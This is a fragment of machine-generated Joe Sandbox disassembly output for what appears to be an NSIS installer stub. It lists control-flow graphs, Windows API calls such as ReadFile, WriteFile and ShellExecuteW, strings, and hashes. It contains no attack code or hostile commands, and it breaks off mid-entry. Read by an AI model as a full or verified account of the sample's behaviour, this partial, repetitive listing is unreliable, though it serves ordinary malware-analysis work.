                                        control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004033F1
                                        • GetTickCount.KERNEL32 ref: 00403492
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                        • wsprintfW.USER32 ref: 004034CE
                                        • WriteFile.KERNELBASE(00000000,00000000,00426979,00403792,00000000), ref: 004034FF
                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CountFileTickWrite$wsprintf
                                        • String ID: (]C$... %d%%$pAB$y)B$yiB
                                        • API String ID: 651206458-3313267460
                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004035C4
                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                        Strings
                                        • soft, xrefs: 004036A1
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                        • Error launching installer, xrefs: 00403603
                                        • Null, xrefs: 004036AA
                                        • Inst, xrefs: 00403698
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 4283519449-527102705
                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                        APIs
                                        • lstrlenW.KERNEL32(00445D80,00426979,759223A0,00000000), ref: 00404FD6
                                        • lstrlenW.KERNEL32(004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FE6
                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FF9
                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406902
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                        • String ID:
                                        • API String ID: 2740478559-0
                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritelstrcpyn
                                        • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                        • API String ID: 247603264-1827671502
                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                        APIs
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                        • API String ID: 3156913733-2180253247
                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                        • String ID: HideWindow
                                        • API String ID: 1249568736-780306582
                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                        APIs
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
